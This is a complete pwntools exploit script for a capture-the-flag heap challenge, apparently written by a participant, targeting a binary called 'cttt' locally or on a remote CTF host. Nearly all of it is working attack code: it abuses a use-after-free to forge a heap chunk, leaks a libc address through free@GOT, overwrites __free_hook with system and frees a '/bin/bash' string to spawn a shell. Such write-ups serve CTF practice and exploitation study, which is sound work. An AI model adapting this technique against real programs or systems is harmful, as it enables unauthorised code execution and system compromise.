exploit.py
from pwn import *
import sys
# Target selection: with no command-line arguments the challenge binary is run
# locally under the bundled loader (debug mode); with any argument the script
# connects to the remote challenge instance instead.
p = (
    process('./ld-linux-x86-64.so.2 --library-path . ./cttt'.split())
    if len(sys.argv) == 1
    else remote('challenges.ctfd.io', 30252)
)
elf = ELF('./cttt')        # challenge binary: provides .symbols and .got lookups below
libc = ELF('./libc.so.6')  # the libc shipped with the challenge; rebased after the leak
##### my useful functions
def V(x):
    """Return ``str(x)`` encoded to bytes (the tube helpers below send bytes)."""
    return str(x).encode()
def answer(i):
    """Send menu choice *i* to the program on the global tube ``p``.

    *i* is converted with ``V`` first, then the helper waits for the
    ``>`` prompt and sends the choice as a single line.
    """
    choice = V(i)
    p.recvuntil(b'>')
    p.sendline(choice)
def create():
    """Send menu choice 1 (the create action, going by the helper's name)."""
    return answer(1)
def edit(i, v):
    """Send menu choice 2 and rewrite entry *i* with the raw bytes *v*.

    *i* is converted with ``V``; *v* is sent unchanged, so callers pass
    bytes (the script passes ``p64(...)`` values and a byte string).
    The prompt strings are matched verbatim against the program's output.
    """
    idx = V(i)
    answer(2)
    p.recvuntil(b'Tracker tracker number?\n')
    p.sendline(idx)
    p.recvuntil(b'New tracker tracker URL?\n')
    p.sendline(v)
def remove(i):
    """Send menu choice 3 and select entry *i* at the number prompt.

    *i* is converted with ``V``; the prompt string is matched verbatim.
    """
    idx = V(i)
    answer(3)
    p.recvuntil(b'Tracker tracker number?\n')
    p.sendline(idx)
def listt():
    """Send menu choice 4 (the listing action, going by the helper's name)."""
    return answer(4)


def exitt():
    """Send menu choice 5 (the exit action, going by the helper's name); unused below."""
    return answer(5)
##### exploit
### make heap ready
# Three allocations followed by three frees. The later steps depend on this
# exact create/remove order, so do not reorder these calls.
create() #1
create() #2
create() #3
remove(1)
remove(2)
remove(3)
### make forged chunk on urls[15]
# Entry 3 has already been removed; writing to it here is the bug the script relies on.
edit(3, p64(elf.symbols['urls'] + 15*8)) # use the last url to avoid a SIGSEGV
create() #4=3 junk
create() #5=forged chunk. I can control the urls[15] value now using 5th url.
### now we can control urls[15]. so let's change its value to free@GOT to leak libc address.
# Note: RELRO only makes the GOT read-only; it does not stop reading it, which is all this step does.
edit(5, p64(elf.got['free']))
listt() # to print that address
# parse leaked data
p.recvuntil(b'16) ')
# NOTE(review): '\n' is a str while every other delimiter in this file is bytes;
# pwntools tolerates the mix, but b'\n' would be consistent.
leak = p.recvuntil('\n', True)
leak = u64(leak.ljust(8, b'\00'))  # pad the short leak to a full 8-byte little-endian value
# set libc address. now we can access everywhere we want! :D
# Rebase the bundled libc so later .sym lookups resolve to runtime addresses.
libc.address = leak - libc.sym['__libc_free']
log.info(f'libc base: {hex(libc.address)}')
### get bash
# hook free function. try to change value of __free_hook variable.
# This only works against the libc shipped with the challenge (./libc.so.6):
# glibc 2.34 and later no longer define __free_hook (the malloc hooks were removed),
# so this write has no target on a current system.
edit(5, p64(libc.sym['__free_hook'])) # remember that entry 5 points to the forged chunk
edit(16, p64(libc.sym['system']))
# change value of 4 to "/bin/bash" and call free on it that also calls system function and launches a bash.
edit(4, b"/bin/bash") # it can be 1,2,3 or any other number
remove(4)
# get shell
p.interactive()